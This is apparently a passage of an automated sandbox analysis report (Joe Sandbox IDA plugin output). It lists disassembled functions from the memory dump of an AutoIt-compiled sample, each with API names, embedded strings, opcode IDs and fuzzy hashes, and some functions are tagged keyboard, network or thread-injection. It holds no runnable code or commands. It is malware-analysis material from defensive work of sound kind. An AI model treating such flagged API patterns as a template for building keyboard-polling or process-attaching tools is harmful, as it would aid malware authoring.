                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                          • String ID: static
                                                                                          • API String ID: 3821898125-2160076837
                                                                                          • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                          • Instruction ID: ec210256144973da47d27f7b6957c5f2e7eb75a95b72ebcf64abc5f684980ca3
                                                                                          • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                          • Instruction Fuzzy Hash: 13416D3260C785CBE760AF25E45875AB361FB89790F904639DA9D47BA8DF3CD444CB10
                                                                                          Function 00007FF74D09C858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 1255039815-0
                                                                                          • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                          • Instruction ID: aefaa50b87aefb126b6268a1f29469ebd2722f6cc79f6a3e7eb66333db82d741
                                                                                          • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                          • Instruction Fuzzy Hash: CE61BD62F0C651CAEB10FF61C8486AC77B5BB85B88B844435DE8A537A8EF38D945C364
                                                                                          Function 00007FF74D0A7BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                          • Instruction ID: d7c017ec1e049089f6a69991a046ff99af4367ff8d7f0ed5dbec9a80db9661cd
                                                                                          • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                          • Instruction Fuzzy Hash: C841A921E0C6C5E9FB71BB609404379AAA0EBA5744FC9C539C7C9033E2EE5DE8948371
                                                                                          Function 00007FF74D03E774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D036838: CreateFileW.KERNELBASE ref: 00007FF74D0368A2
                                                                                            • Part of subcall function 00007FF74D054380: GetCurrentDirectoryW.KERNEL32(?,00007FF74D03E817), ref: 00007FF74D05439C
                                                                                            • Part of subcall function 00007FF74D0356D4: GetFullPathNameW.KERNEL32(?,00007FF74D0356C1,?,00007FF74D037A0C,?,?,?,00007FF74D03109E), ref: 00007FF74D0356FF
                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF74D03E8B0
                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF74D03E9FA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                          • API String ID: 2207129308-1018226102
                                                                                          • Opcode ID: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                                          • Instruction ID: c399412e58495e5a093ebb4e0e83ea4a97fea7738764385deffba125e61757ff
                                                                                          • Opcode Fuzzy Hash: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                                          • Instruction Fuzzy Hash: 1A127132A1C682C6EB10FB65D4501FDA760FB85794FD05232EACD47AAAEEBCD505C720
                                                                                          Function 00007FF74D0C66B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                          • API String ID: 636576611-1287834457
                                                                                          • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                          • Instruction ID: 531aad6455a556532e22577dbd25ecbb11ca5d44a7ee70be6fa9c00156a1bad0
                                                                                          • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                          • Instruction Fuzzy Hash: 17713A26B0CA06C1EB28BF26E4542BDA760EB44F98FD45531DE8E47775EF38E4498360
                                                                                          Function 00007FF74D0C2A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                          • String ID: 5$Ping
                                                                                          • API String ID: 1486594354-1972892582
                                                                                          • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                                          • Instruction ID: 024868524fdfc81aa238663c4c19497825d0d5a2d18476b5ece9dcb7b4137800
                                                                                          • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                                          • Instruction Fuzzy Hash: 5F716E62A0C642C6EB24FB65D5943BDB760FB84B90F818431DA8D477A1EFBCD4458720
                                                                                          Function 00007FF74D06D504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                          • API String ID: 3215553584-2617248754
                                                                                          • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                          • Instruction ID: 8f5f530efc79e6b019dc651ac09624a37fe69c5921b409aeb99b45226156fc81
                                                                                          • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                          • Instruction Fuzzy Hash: F9418B72B0DB49C9E754EF65E8517A973A4EB08398F804136EA9C07BA4EE3CD0258350
                                                                                          Function 00007FF74D0A76D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                          • API String ID: 4007322891-4153970271
                                                                                          • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                          • Instruction ID: 7360668a5743fd9b6a178234df09a0f184c8a796cadd360494af9e999a61b841
                                                                                          • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                          • Instruction Fuzzy Hash: 9A316232A1CA86D2DB10FB15E4446ADA360FB94B84FD18132EA8D477A9EF7CD505CB60
                                                                                          Function 00007FF74D09E1AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2573188126-1403004172
                                                                                          • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                          • Instruction ID: 8a1c5285e2a8d3d36520d8975baa73e46b4be67256660ad87d979f10867d7677
                                                                                          • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                          • Instruction Fuzzy Hash: 1131C131B0DA85C2EB20BB15E9582BDA361FF89BD0F844131DADD077A5EE2CD5058760
                                                                                          Function 00007FF74D09E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2573188126-1403004172
                                                                                          • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                          • Instruction ID: b2b3a9ad54cc71a68978766f87c223399e3040e392d99762ea9810d6da4b3501
                                                                                          • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                          • Instruction Fuzzy Hash: D531C631A0DB85C2EA10BB15E8182BDA361FF89BE0F844631DEED077E5EE2CD5058760
                                                                                          Function 00007FF74D0ACA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                          • String ID: 0.0.0.0
                                                                                          • API String ID: 2479661705-3771769585
                                                                                          • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                                          • Instruction ID: 007a639435b755bb5edd67b1bcb88a74b7bc9066f1aaf232567f2b7cd2352a9e
                                                                                          • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                                          • Instruction Fuzzy Hash: EB213B21A1C986C1EA20BB11E4543BDA361EF99B80FC14136D98D47AB5FE6CE544C334
                                                                                          Function 00007FF74D0E0D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                          • String ID:
                                                                                          • API String ID: 2672075419-0
                                                                                          • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                                          • Instruction ID: f2a4efd5338c36cb9a7bebd51fe71ca1dbe8a457d0352488f128f9a562c12159
                                                                                          • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                                          • Instruction Fuzzy Hash: CB91A236B0C65ACAE750FF61D4443BDA3A1FB48B88F904035DE8D43BA5EE78E4058720
                                                                                          Function 00007FF74D0A92E4 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2156557900-0
                                                                                          • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                          • Instruction ID: 24a1bd34a82a1e36f90723067d8d5925ef3de9b9908c21089285d4d7653290c4
                                                                                          • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                          • Instruction Fuzzy Hash: 51315C25B0C603C6EB54FBA5B858639F2A1AB59790FD04538CD8E93764FE3DE8458A30
                                                                                          Function 00007FF74D09E908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                          • String ID:
                                                                                          • API String ID: 685491774-0
                                                                                          • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                          • Instruction ID: bd53fe7e03560877725ed90cbbfb4e82bbb2dbd18dd0d4e101dec78cc59f2374
                                                                                          • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                          • Instruction Fuzzy Hash: 2E11A235F0C54AC2F724BB76E85C66E6261AFCCB80F805838C99E4BB64EE3DD4548360
                                                                                          Function 00007FF74D09F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                          • API String ID: 0-1603158881
                                                                                          • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                          • Instruction ID: 1321dcec4fbfbff96ef9d5ddfdda9cc50725845b1cb6f20266036041c1ec8e6b
                                                                                          • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                          • Instruction Fuzzy Hash: CB12CE62F1D643D2EA68BB20C8112F9E692BF56784FD44572DA9D872A1FF7CE5408220
                                                                                          Function 00007FF74D0C767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Init$Clear
                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                          • API String ID: 3467423407-1765764032
                                                                                          • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                          • Instruction ID: 1ef84c10e26535b3517dbbcf1d566fdf5e656f95171d8eb89b7064a804c31a65
                                                                                          • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                          • Instruction Fuzzy Hash: CBA17A36A0CB42C6EB24BB65E4406ADA7A0FB89B98F940136DE8D03B64EF7CD445C750
                                                                                          Function 00007FF74D0DA350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
